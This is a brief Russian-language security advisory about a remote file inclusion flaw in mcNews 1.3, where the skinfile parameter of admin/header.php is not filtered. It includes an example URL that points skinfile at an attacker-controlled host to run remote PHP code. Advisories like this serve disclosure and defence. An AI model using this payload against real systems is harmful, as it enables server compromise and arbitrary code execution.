Программа: mcNews 1.3 

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.
Уязвимость существует в сценарии ‘mcNews/admin/header.php’ из-за недостаточной фильтрации входных данных в переменной skinfile. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. 

Пример:

http://[target]/[dir]/mcNews/admin/header.php?skinfile=http://[attacker]/



Оставить мнение